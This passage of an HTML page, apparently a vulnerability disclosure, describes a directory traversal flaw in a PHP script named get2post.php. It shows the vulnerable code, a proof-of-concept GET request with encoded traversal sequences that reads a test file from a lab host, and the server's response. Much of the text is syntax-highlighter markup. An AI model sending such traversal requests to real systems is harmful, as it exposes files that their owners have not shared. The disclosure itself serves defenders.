<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">_GET<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8220;file_name&#8221;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5939cd76532bd434214407-3\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">file_get_contents<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">fileName<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5939cd76532bd434214407-4\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5939cd76532bd434214407-5\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">str_replace<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&#8221;&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;&amp;quot;&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5939cd76532bd434214407-6\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5939cd76532bd434214407-7\"><span class=\"crayon-e\">unlink<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">fileName<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5939cd76532bd434214407-8\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5939cd76532bd434214407-9\"><span class=\"crayon-e\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&lt;input type=&#8221;hidden&#8221; name=&#8221;script&#8221; value=&#8221;&#8221;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-s\">&#8220;&#8221;&gt;n&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0021 seconds] -->  <\/p>\n<p>User controlled data entering the HTTP GET parameter \u201cfile_name\u201d is sanitized by removing all occurrences of the \u201c\u201d character, and is then passed to the \u201cfile_get_contents\u201d function. Next, then contents of the file (now in the $data variable) is printed in the application\u2019s HTTP response.<\/p>\n<p><strong>Proof of Concept<\/strong><br \/> The following HTTP GET request provides proof-of-concept that will retrieve the contents of a file named \u201ctest.txt\u201d that exists in the root of \u201cC:\u201d<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5939cd76532c2088753931\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> GET  \/wizards\/get2post.php?file_name=%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5ctest.t  xt HTTP\/1.1  Host: 192.168.199.129:9999  User-Agent: Mozilla\/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko\/20100101  Firefox\/51.0  Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8  Accept-Language: en-US,en;q=0.5  Cookie: PHPSESSID=8q7o2ckle9c6lcte045t7dufe2; cookieId=8q7o2ckle9c6lcte045t7dufe2  Connection: close  Upgrade-Insecure-Requests: 1<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5939cd76532c2088753931-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5939cd76532c2088753931-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5939cd76532c2088753931-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5939cd76532c2088753931-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5939cd76532c2088753931-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5939cd76532c2088753931-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5939cd76532c2088753931-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5939cd76532c2088753931-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5939cd76532c2088753931-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5939cd76532c2088753931-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5939cd76532c2088753931-11\">11<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5939cd76532c2088753931-1\"><span class=\"crayon-v\">GET<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5939cd76532c2088753931-2\"><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">wizards<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">get2post<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">php<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-v\">file_name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">2e<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">2e<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">5c<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">2e<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">2e<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">5c<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">2e<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">2e<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">5c<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">2e<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">2e<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">5c<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">2e<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">2e<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">5ctest.t<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5939cd76532c2088753931-3\"><span class=\"crayon-e\">xt <\/span><span class=\"crayon-v\">HTTP<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">1.1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5939cd76532c2088753931-4\"><span class=\"crayon-v\">Host<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.199.129<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">9999<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5939cd76532c2088753931-5\"><span class=\"crayon-v\">User<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Agent<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Mozilla<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">5.0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">Windows <\/span><span class=\"crayon-i\">NT<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">10.0<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">WOW64<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">rv<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">51.0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Gecko<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">20100101<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5939cd76532c2088753931-6\"><span class=\"crayon-v\">Firefox<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">51.0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5939cd76532c2088753931-7\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">html<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">xhtml<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">xml<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">xml<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.9<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.8<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5939cd76532c2088753931-8\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Language<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">en<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">US<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">en<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.5<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5939cd76532c2088753931-9\"><span class=\"crayon-v\">Cookie<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">PHPSESSID<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">8q7o2ckle9c6lcte045t7dufe2<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">cookieId<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">8q7o2ckle9c6lcte045t7dufe2<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5939cd76532c2088753931-10\"><span class=\"crayon-v\">Connection<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">close<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5939cd76532c2088753931-11\"><span class=\"crayon-v\">Upgrade<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Insecure<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Requests<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0051 seconds] -->  <\/p>\n<p>After executing this proof-of-concept against the vulnerable host, the following HTTP response was received containing the contents of the \u201ctest.txt\u201d file that was placed in the root of \u201cC:\u201d<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5939cd76532c5703004677\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> HTTP\/1.1 200 OK  Date: Mon, 06 Mar 2017 15:12:05 GMT  Server: Apache\/2.4.20 (Win64) PHP\/5.4.45 OpenSSL\/1.0.2g  X-Powered-By: PHP\/5.4.45  Expires: Thu, 19 Nov 1981 08:52:00 GMT  Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0  Pragma: no-cache  Vary: Accept-Encoding  Content-Length: 796  Connection: close  Content-Type: text\/html    &lt;html&gt;  &lt;head&gt;  &lt;title&gt;Processing&#8230;&lt;\/title&gt;  &lt;\/head&gt;  &lt;body onLoad=&#8221;document.form.submit()&#8221;&gt;  &lt;form name=&#8221;form&#8221; action=&#8221;..\/main.php?section=ERDCInstance&amp;subsection=add&#8221;  method=&#8221;post&#8221;&gt;  &lt;input type=&#8221;hidden&#8221; name=&#8221;file_name&#8221; value=&#8221;&#8230;&#8230;&#8230;.test.txt&#8221;&gt;  &lt;input type=&#8221;hidden&#8221; name=&#8221;script&#8221;  value=&#8221;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&#8221;&gt;  &lt;input type=&#8221;hidden&#8221; name=&#8221;category&#8221; value=&#8221;agentless&#8221;&gt;  &lt;input type=&#8221;hidden&#8221; name=&#8221;isWizard&#8221; value=&#8221;1&#8243;&gt;  &lt;input type=&#8221;hidden&#8221; name=&#8221;wizardPage&#8221; value=&#8221;1&#8243;&gt;  &lt;input type=&#8221;hidden&#8221; name=&#8221;wizardNumPages&#8221; value=&#8221;2&#8243;&gt;  &lt;input type=&#8221;hidden&#8221; name=&#8221;wizardTask&#8221; value=&#8221;pageContinue&#8221;&gt;  &lt;input type=&#8221;hidden&#8221; name=&#8221;visitedPage[1]&#8221; value=&#8221;1&#8243;&gt;  &lt;input type=&#8221;hidden&#8221; name=&#8221;fromGet2Post&#8221; value=&#8221;true&#8221;&gt;  &lt;img src=&#8221;\/images\/InProgress.gif&#8221;&gt;  &lt;\/form&gt;  &lt;\/body&gt;  &lt;\/html&gt;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5939cd76532c5703004677-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5939cd76532c5703004677-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5939cd76532c5703004677-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5939cd76532c5703004677-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5939cd76532c5703004677-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5939cd76532c5703004677-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5939cd76532c5703004677-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5939cd76532c5703004677-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5939cd76532c5703004677-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5939cd76532c5703004677-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5939cd76532c5703004677-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5939cd76532c5703004677-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5939cd76532c5703004677-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5939cd76532c5703004677-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5939cd76532c5703004677-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5939cd76532c5703004677-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5939cd76532c5703004677-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5939cd76532c5703004677-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5939cd76532c5703004677-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5939cd76532c5703004677-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5939cd76532c5703004677-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5939cd76532c5703004677-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5939cd76532c5703004677-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5939cd76532c5703004677-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5939cd76532c5703004677-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5939cd76532c5703004677-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5939cd76532c5703004677-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5939cd76532c5703004677-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5939cd76532c5703004677-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5939cd76532c5703004677-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5939cd76532c5703004677-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5939cd76532c5703004677-32\">32<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5939cd76532c5703004677-33\">33<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5939cd76532c5703004677-1\"><span class=\"crayon-v\">HTTP<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">200<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">OK<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5939cd76532c5703004677-2\"><span class=\"crayon-v\">Date<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Mon<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">06<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">Mar<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2017<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">15<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">12<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">05<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">GMT<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5939cd76532c5703004677-3\"><span class=\"crayon-v\">Server<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Apache<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">2.4.20<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">Win64<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">PHP<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">5.4.45<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">OpenSSL<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">1.0.2g<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5939cd76532c5703004677-4\"><span class=\"crayon-v\">X<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Powered<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">By<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">PHP<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">5.4.45<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5939cd76532c5703004677-5\"><span class=\"crayon-v\">Expires<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Thu<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">19<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">Nov<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1981<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">08<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">52<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">GMT<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5939cd76532c5703004677-6\"><span class=\"crayon-v\">Cache<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Control<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">no<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">store<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">no<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">cache<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">must<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">revalidate<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">post<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">check<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">pre<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">check<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5939cd76532c5703004677-7\"><span class=\"crayon-v\">Pragma<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">no<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">cache<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5939cd76532c5703004677-8\"><span class=\"crayon-v\">Vary<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">Encoding<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5939cd76532c5703004677-9\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Length<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">796<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5939cd76532c5703004677-10\"><span class=\"crayon-v\">Connection<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">close<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5939cd76532c5703004677-11\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Type<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">html<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5939cd76532c5703004677-12\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5939cd76532c5703004677-13\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">html<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5939cd76532c5703004677-14\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">head<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5939cd76532c5703004677-15\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">title<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">Processing<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">title<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5939cd76532c5703004677-16\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">head<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5939cd76532c5703004677-17\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">body <\/span><span class=\"crayon-v\">onLoad<\/span><span class=\"crayon-o\">=<\/span><span 